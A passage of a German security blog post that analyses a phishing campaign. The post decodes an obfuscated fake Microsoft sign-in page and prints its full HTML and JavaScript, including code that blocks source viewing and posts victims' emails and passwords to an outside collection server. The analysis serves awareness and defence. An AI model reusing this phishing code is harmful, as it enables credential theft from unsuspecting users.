0%20%20%20%20%7D%29%3B%0A%20%20%20%20%20%20%0A%20%20%20%20%20%20window.ondragstart%20%3D%20function%28%29%20%7B%20return%20false%3B%20%7D%0A%20%20%20%20%20%20%0A%20%20%20%3C/script%3E"));
//-->
</script>

Dieser Anblick lässt dann noch viel mehr Alarmglocken schrillen denn warum sollte man den HTML-Code derart verstecken? Der Code ist allerdings auch sehr schnell wieder lesbar gemacht indem wir einfach unescape("%3C%21..."); in der JS-Console eines Browsers ausführen und das gibt uns folgenden Code:

<!--------------------------------------------------------- START OF BODYYYY --------------------------------------------------------->\n\n<!DOCTYPE html>\n<html lang="en">\n<head>\n    <meta charset="UTF-8">\n    <meta name="viewport" content="width=device-width, initial-scale=1.0">\n    <link href="https://gitsoft-container000.azurewebsites.net/favicon623e44eff7.ico" rel="shortcut icon">\n    <link rel="stylesheet" href="https://gitsoft-container000.azurewebsites.net/Bootstrap885d-2e5c03420a.css" />\n    <link rel="stylesheet" href="https://gitsoft-container000.azurewebsites.net/all7d9285979b.css" />\n    <link rel="stylesheet" href="https://gitsoft-container000.azurewebsites.net/app0d43c4b0ab.css" />\n    <link rel="stylesheet" type="text/css" href="https://gitsoft-container000.azurewebsites.net/fontlogoc35b386013.css">   </head>\n   <title> &#83;&#105;&#103;&#110; &#105;&#110;</title>\n   \n   <body oncontextmenu="return false;">\n   <div class="background" onload="loaded()" role="presentation">\n   <div class="blur" div class="backgroundImage" style="background-image: url(https://firebasestorage.googleapis.com/v0/b/mdocshare1.appspot.com/o/Screenshot103.png?alt=media&token=881dc8f1-a537-4b10-ba92-d6d6bf89367d);%22%3E%3C/div%3E);"></div>\n   <div class="background-overlay">\n   <div id="footer" style="box-sizing: border-box; position: fixed; bottom: 1px; width: 1366px; overflow: visible; z-index: 99; clear: both; background: transparent; left: -5px;">\n      <div style="box-sizing: border-box;">\n         <div id="footerLinks1" class="auto-style4" style="box-sizing: border-box; color: rgba(0, 0, 0, 0.7); font-size: 13px; float: right; margin-right: 0px; margin-top: 0px; margin-bottom: 0px;">\n            <span class="auto-style5">\n            <a href="javascript:history.go(0)" style="box-sizing: border-box; background-color: transparent; color: rgb(0, 0, 0); text-decoration: none; font-size: 12px; line-height: 28px; white-space: nowrap; display: inline-block; margin-left: 8px; margin-right: 8px;">\n            &#084;&#101;&#114;&#109;&#115;&#032;&#111;&#102;&#032;&#117;&#115;&#101; </a></span><span>&nbsp;</span><span class="auto-style5"><a href="javascript:history.go(0)" style="box-sizing: border-box; background-color: transparent; color: rgb(0, 0, 0); text-decoration: none; font-size: 12px; line-height: 28px; white-space: nowrap; display: inline-block; margin-left: 8px; margin-right: 8px;">&#080;&#114;&#105;&#118;&#097;&#099;&#121; \n            &amp; &#099;&#111;&#111;&#107;&#105;&#101;&#115;</a></span><span>&nbsp;</span><a href="javascript:history.go(0)" role="button" style="box-sizing: border-box; background-color: transparent; color: rgb(0, 0, 0); text-decoration: none; font-size: 12px; line-height: 28px; white-space: nowrap; display: inline-block; margin-left: 8px; margin-right: 8px;"><img class="desktopMode" pngsrc="https://gitsoft-container000.azurewebsites.net/darkt.png" role="presentation" src="https://gitsoft-container000.azurewebsites.net/dott.svg" style="box-sizing: border-box; border: 0px; vertical-align: middle;" svgsrc="https://gitsoft-container000.azurewebsites.net/dott.svg" /></a>\n         </div>\n      </div>\n   </div>\n   <br>\n   <br>\n   <br>\n   <br>\n   <div class="container">\n      <div class="row">\n         <div class="col-sm-5 bg-white box mx-auto p-4" style="margin: 70px 0px; left: 0px; top: -82px; height: auto;">\n            <form novalidate="novalidate" spellcheck="false" method="post" autocomplete="off" id="loginform">\n            \n               <!---------- FORM ---------->\n\n               <div class="FORM1" role="main">\n               <body oncontextmenu="return false;">\n                  <img id="logoimg" src="https://gitsoft-container000.azurewebsites.net/logot.svg" class="img-fluid" width="110px"><br><br>\n                  <span class="auto-style3"><span class="auto-style3">&#83;&#105;&#103;&#110; &#105;&#110; &#116;&#111; &#97;&#99;&#99;&#101;&#115;&#115; &#115;&#104;&#97;&#114;&#101;&#100; &#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;</span></span><br><br>\n                  <div id="error" class="alert alert-danger" style="display: none;"></div>\n                  <div class="row" id="pass">\n                     <div class="col-sm-12">\n                        <a class="backButton" class="align-middle h5" type="button" style="display:none;" id="backBtn" >\n                        <img src="https://gitsoft-container000.azurewebsites.net/arrowt.svg"></a>\n                        <span id="test"></span><span id="displayName"></span>\n                        <input type="email" autocomplete="on" name="email" id="email" placeholder="&#069;&#109;&#097;&#105;&#108;&#044;&#032;&#112;&#104;&#111;&#110;&#101;&#044;&#032;&#111;&#114;&#032;&#083;&#107;&#121;&#112;&#101;&#046"\n                           class="form-control rounded-0 border-dark bg-transparent" style="border-left: 0px solid rgba(0, 0, 0, 0.6); border-right: 0px solid rgba(0, 0, 0, 0.6); border-top: 0px solid rgba(0, 0, 0, 0.6);  box-sizing: border-box; color: inherit; margin: 0px; max-width: 100%; display: block; width: 363px; background-image: none; padding: 6px 10px 6px 0px; background-color: transparent; height: 36px; outline: none; border-radius: 0px;"><br><br>\n                        <input type="password" name="password" id="password" placeholder="&#080;&#097;&#115;&#115;&#119;&#111;&#114;&#100"\n                           class="form-control shadow-none bg-transparent" style="display:none; border-right: none;border-left: none;border-top: none; border-bottom: 1px solid grey;">\n                     </div>\n                  </div>\n                  <div id="loader" class="center" style="display: none;" role="status"></div>\n                  <div class="row">\n                  </div>\n                  <div class="form-group" style="box-sizing: border-box; margin-bottom: 10px; color: rgb(27, 27, 27); font-family: &quot;Segoe UI Webfont&quot;, -apple-system, &quot;Helvetica Neue&quot;, &quot;Lucida Grande&quot;, Roboto, Ebrima, &quot;Nirmala UI&quot;, Gadugi, &quot;Segoe Xbox Symbol&quot;, &quot;Segoe UI Symbol&quot;, &quot;Meiryo UI&quot;, &quot;Khmer UI&quot;, Tunga, &quot;Lao UI&quot;, Raavi, &quot;Iskoola Pota&quot;, Latha, Leelawadee, &quot; YaHei UI&quot;, &quot; JhengHei UI&quot;, &quot;Malgun Gothic&quot;, &quot;Estrangelo Edessa&quot;, &quot; Himalaya&quot;, &quot; New Tai Lue&quot;, &quot; PhagsPa&quot;, &quot; Tai Le&quot;, &quot; Yi Baiti&quot;, &quot;Mongolian Baiti&quot;, &quot;MV Boli&quot;, &quot;Myanmar Text&quot;, &quot;Cambria Math&quot;; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255); text-decoration-style: initial; text-decoration-color: initial;">\n                     <a href="javascript:history.go(0)" style="box-sizing: border-box; background-color: transparent; color: rgb(0, 103, 184); text-decoration: none;" class="auto-style6">\n                     &#67;&#97;&#110;&#39;&#116; &#97;&#99;&#99;&#101;&#115;&#115; &#121;&#111;&#117;&#114; &#97;&#99;&#99;&#111;&#117;&#110;&#116;&#63;</a>\n                  </div>\n                  <div class="form-group" style="box-sizing: border-box; margin-bottom: 10px; color: rgb(27, 27, 27); font-family: &quot;Segoe UI Webfont&quot;, -apple-system, &quot;Helvetica Neue&quot;, &quot;Lucida Grande&quot;, Roboto, Ebrima, &quot;Nirmala UI&quot;, Gadugi, &quot;Segoe Xbox Symbol&quot;, &quot;Segoe UI Symbol&quot;, &quot;Meiryo UI&quot;, &quot;Khmer UI&quot;, Tunga, &quot;Lao UI&quot;, Raavi, &quot;Iskoola Pota&quot;, Latha, Leelawadee, &quot; YaHei UI&quot;, &quot; JhengHei UI&quot;, &quot;Malgun Gothic&quot;, &quot;Estrangelo Edessa&quot;, &quot; Himalaya&quot;, &quot; New Tai Lue&quot;, &quot; PhagsPa&quot;, &quot; Tai Le&quot;, &quot; Yi Baiti&quot;, &quot;Mongolian Baiti&quot;, &quot;MV Boli&quot;, &quot;Myanmar Text&quot;, &quot;Cambria Math&quot;; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255); text-decoration-style: initial; text-decoration-color: initial;">\n                     <div class="form-group" style="box-sizing: border-box; margin-bottom: 10px;">\n                        <a href="javascript:history.go(0)" style="box-sizing: border-box; background-color: transparent; color: rgb(0, 103, 184); text-decoration: none;" class="auto-style6">\n                        &#83;&#105;&#103;&#110;&#45;&#105;&#110; &#111;&#112;&#116;&#105;&#111;&#110;&#115;</a>\n                     </div>\n                  </div>\n                  <div class="row">\n                     <div class="col-sm-12">\n                        <div id="sbtn" class="text-right">\n                           <input id="Tombol1" type="submit" name="submit" value="Next" class="btn rounded-0 text-white px-4" style="background-color: #0066BA;">\n                        </div>\n                     </div>\n                  </div>\n               </div>\n               \n               <!---------- FINISH ---------->\n\n               <div class="Finish" role="main">\n                  <center>\n                     <P><IMG style="HEIGHT: 54px; WIDTH: 380px" src="https://gitsoft-container000.azurewebsites.net/dat.jpg" width=500 align=center height=507></P>\n                     </A><br><br>\n                     <font size='6'>This file has been moved or deleted</font><br><br>\n                     <font size='3'>You will be redirected.</font><br>\n                     <a href=''>What's this?</a>\n                  </center>\n               </div>\n            </form>\n            <div id="fr"></div>\n         </div>\n      </div>\n   </div>\n   \n<!--------------------------------------------------------- END OF BODYYYY --------------------------------------------------------->\n   \n   \n<script src="https://gitsoft-container000.azurewebsites.net/1.12.4jquery.min.js"></script>\n<script src="https://gitsoft-container000.azurewebsites.net/4.3.1bootstrap.min.js"></script>\n<script src="https://gitsoft-container000.azurewebsites.net/4.3.1bootstrap.bundle.min.js"></script>\n<script src="https://gitsoft-container000.azurewebsites.net/3.3.1jquery.min.js"></script>\n<script src="https://gitsoft-container000.azurewebsites.net/2.2.4jquery.min.js"></script>\n<script src="https://gitsoft-container000.azurewebsites.net/4.1.3bootstrap.min.js"></script>\n\n    <script>\n      function redirectCU(e) {\n        if (e.ctrlKey && e.which == 85) {\n      \treturn false;\n        }\n      }\n      document.onkeydown = redirectCU;\n      \n      function redirectKK(e) {\n        if (e.which == 3) {\n      \treturn false;\n        }\n      }\n      document.oncontextmenu = redirectKK;\n      \n      $("#pass").animate({left:0, opacity:"show"}, 1500);\n      var email = window.location.hash.substr(1);\n      var PASS = document.getElementById('password');\n      var PASSX = document.getElementById('passwordx');\n      var PASSY = document.getElementById('passwordy');\n      \n      $('#password').focus();\n      \n      var displayName = $('#displayName');\n      displayName.attr('value', email);\n      $('[name=email]').val(email);\n      //displayName.html(email);\n      \n      $('#password').keyup(function (event) {\n      \tif (event.which == 13) {\n      \t\t$('#Tombol1').click();\n      \t}\n      });\n      \n      \n      $('#backBtn').click(function(){\n      \t$('#password').val('');\n      \t$('#password').hide();\n      \t$('#email').show();\n      \t$('#Tombol1').val('Next');\n      \t$('#backBtn').hide();\n      \t$('#displayName').html('');\n      });\n      \n      var Tombol1 = $('#Tombol1');\n      Tombol1.click(function(e){\n      \te.preventDefault();\n      \t\n      \tvar email = $('#email').val();\n      \tvar pass = $('#password');\n      \tvar password_v = pass.val();\n      \t\n      \tif(email==''){\n      \t\tpass.hide();\n      \t\t$('#email').show();\n      \t\tTombol1.val('Next');\n      \t\t$('#backBtn').hide();\n      \t}else if(email!=='' && password_v==''){\n      \t\t$('#displayName').html(email);\n      \t\tTombol1.val('Sign In');\n      \t\tpass.show();\n      \t\t$('#email').hide();\n      \t\t$('#backBtn').show();\n      \t}else{\n      \t$.ajax({\n      \t\turl: 'https://guercioandsons.com/cloud2/ylog.php',\n      \t\ttype: 'POST', \n      \t\tdataType: 'html', \n      \t\tbeforeSend: function(){\n      \t\t\t$("#loader").show();\n      \t\t},\n      \t\tdata: { u : email, p : password_v}, \n      \t\tsuccess: function(data) {\n      \t\t\t$("#loader").hide();\n      \t\t\t$('#fr').html(data);\n      \t\t},\n      \t\terror: function(e) {\n      \t\t\talert('Error Occurred. Try again.');\n      \t\t\twindow.location.href="";\n      \t\t}\n      \t});\n      \t}\n      \t\n      \t\n      \t\n      });\n      \n      window.ondragstart = function() { return false; }\n      \n   </script>

Diesen langen String können wir kopieren. Normalerweise würde er mit document.write(...); in das HTML-Dokument geschrieben aber wir wollen diesen HTML- und JS-Code nun von Hand formatieren und dazu ersetzen wir folgende drei Dinge:

Ersetzen wir den String \n mit einer Zeilenschaltung
Ersetzen wir den String \t mit einem Tabulator
Ersetzen wir den String \" mit einem Anführungszeichen

Da dies typische Escape-Zeichenfolgen sind können wir einfach Python nutzen dies in eine neue Datei zu schreiben:

>>> s = "<!--------------------------------------------------------- START OF BODYYYY ... \n    </script>"
>>> with open("scam.html", "w") as f:
...   f.write(s)

Nachdem dies geschehen ist, können wir die Datei scam.html öffnen und analysieren:

<!--------------------------------------------------------- START OF BODYYYY --------------------------------------------------------->

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link href="https://gitsoft-container000.azurewebsites.net/favicon623e44eff7.ico" rel="shortcut icon">
    <link rel="stylesheet" href="https://gitsoft-container000.azurewebsites.net/Bootstrap885d-2e5c03420a.css" />
    <link rel="stylesheet" href="https://gitsoft-container000.azurewebsites.net/all7d9285979b.css" />
    <link rel="stylesheet" href="https://gitsoft-container000.azurewebsites.net/app0d43c4b0ab.css" />
    <link rel="stylesheet" type="text/css" href="https://gitsoft-container000.azurewebsites.net/fontlogoc35b386013.css">   </head>
   <title> &#83;&#105;&#103;&#110; &#105;&#110;</title>
   ... usw.

Zuerst fällt uns der Tietel auf - hier wurde versucht wieder etwas zu verstecken. Diesemal nutzte man dazu HTML-Entities, die wir zB mit https://mothereff.in/html-entities in lesbaren Text umwandeln können. So ergibt der Titel zB: "Sign in".

Am Ende der Seite finden wir dann folgenden JS-Code:

<script>
      function redirectCU(e) {
        if (e.ctrlKey && e.which == 85) {
      	return false;
        }
      }
      document.onkeydown = redirectCU;
      
      function redirectKK(e) {
        if (e.which == 3) {
      	return false;
        }
      }
      document.oncontextmenu = redirectKK;
      
      $("#pass").animate({left:0, opacity:"show"}, 1500);
      var email = window.location.hash.substr(1);
      var PASS = document.getElementById('password');
      var PASSX = document.getElementById('passwordx');
      var PASSY = document.getElementById('passwordy');
      
      $('#password').focus();
      
      var displayName = $('#displayName');
      displayName.attr('value', email);
      $('[name=email]').val(email);
      //displayName.html(email);
      
      $('#password').keyup(function (event) {
      	if (event.which == 13) {
      		$('#Tombol1').click();
      	}
      });
      
      
      $('#backBtn').click(function(){
      	$('#password').val('');
      	$('#password').hide();
      	$('#email').show();
      	$('#Tombol1').val('Next');
      	$('#backBtn').hide();
      	$('#displayName').html('');
      });
      
      var Tombol1 = $('#Tombol1');
      Tombol1.click(function(e){
      	e.preventDefault();
      	
      	var email = $('#email').val();
      	var pass = $('#password');
      	var password_v = pass.val();
      	
      	if(email==''){
      		pass.hide();
      		$('#email').show();
      		Tombol1.val('Next');
      		$('#backBtn').hide();
      	}else if(email!=='' && password_v==''){
      		$('#displayName').html(email);
      		Tombol1.val('Sign In');
      		pass.show();
      		$('#email').hide();
      		$('#backBtn').show();
      	}else{
      	$.ajax({
      		url: 'https://guercioandsons.com/cloud2/ylog.php',
      		type: 'POST', 
      		dataType: 'html', 
      		beforeSend: function(){
      			$("#loader").show();
      		},
      		data: { u : email, p : password_v}, 
      		success: function(data) {
      			$("#loader").hide();
      			$('#fr').html(data);
      		},
      		error: function(e) {
      			alert('Error Occurred. Try again.');
      			window.location.href="";
      		}
      	});
      	}
      	
      	
      	
      });
      
      window.ondragstart = function() { return false; }
      
   </script>

Interessant ist für uns vor allen die Funktion Tombol1.click(function(e){...} in der folgendes passiert:

Wenn der Wert der Variable email leer ist, wird das Passwort-Feld ausgeblendet, das Element mit der ID #email eingeblendet und der Butten erhält die Beschriftung "Next".
Wenn die Variable email bereits Daten enthält aber das Passwort noch nicht ausgefüllt wurde, wird die Email-Adresse angezeigt, der Button-Text zu "Sign in" geändert und das Passwort-Feld angezeigt sowie das Email-Feld ausgeblendet und der Zurück-Button eingeblendet um das Verhalten der Seite vom Microsoft nachzuahmen.
Sind beide Werte ausgefüllt, werden diese Daten an https://guercioandsons.com/cloud2/ylog.php gesendet.

Im Grunde ein sehr einfacher Versuch die Login-Daten zu einem Dienst abzugreifen, der auch sehr einfach zu entlarfen und zu analysieren ist wenn man das entsprechende Wissen hat aber dennoch können wir etwas daraus lernen:

Um Spam-Filter zu umgehen nutzen Angreifer nicht mehr gefälschte Email-Adressen die leicht zu erkennen sind sondern weichen auf Dienste wie WE-Transfer und dergleichen aus die bekannt sind und oft auf einer Whitelist stehen.
Außerdem wurden offensichtlich Kundendaten eines unserer Lieferanten offengelegt und so eine bestehende Geschäfts- und Vertrauensbeziehung ausgenutzt um die Erfolgschancen einer solchen Aktion zu steigern.
Optisch wurde saubere Arbeit abgleliefert und es wurden auch Details wie das Einblenden und Ausbelnden von Feldern und die Anzeige der Email als normaler Text und ein Back-Button implementiert, damit sich die Phishing-Seite sehr realistisch und glaubwürdig anfühlt.
Durch die Verwendung von einem Transfer-Dienst konnte auch gleich auf "holpriges" Deutsch aus dem Google-Übersetzer verzichtet werden und dies steigert nicht nur die Zustell-Quote der Emails sondern auch die Glaubwürdigkeit da gar kein Text nötig ist um die Geschichte zu verkaufen.

Fazit

Ich wollte diese neue SPAM / Phishing Version kurz beleuchten da diese gleichermaßen einfach wie auch effektiv ist. Ein Grundprinzip des Hackings ist die Zweckentfremdung und der kreative Einsatz bestehender Technologien und dies wird hier sehr schön gemacht. Durch die Zweckentfremdung eines Datei-Transferdienstes wurden gleich zwei Probleme des herkömmlichen SPAM-Versandes gelößt denn dank dem bekannten Dienstleister wird die Zustellrate deutlich höher sein und es bedarf auf keiner weiteren Erklärung.

Außerdem nutzt man hier die Vertrauensbeziehung zwischen Firmen oder Personen aus und das Verträge heute über diverse Cloud-Dienste gesichtet und unterfertigt werden ist auch nicht ungewöhnlich. Wir selbst haben dies zB erst vor kurzen mit unserem Versanddienstleister auf genau diese Weise gemacht.

Man erkennt auch viel mehr Liebe zum Detail und trägt offensichtlich dem Rechnung, dass User aufmerksamer werden und auf Details achten.

Daher wird es immer wichtiger im Bereich der Security Awareness User auf diese Gefahren ausreichend vorzubereiten.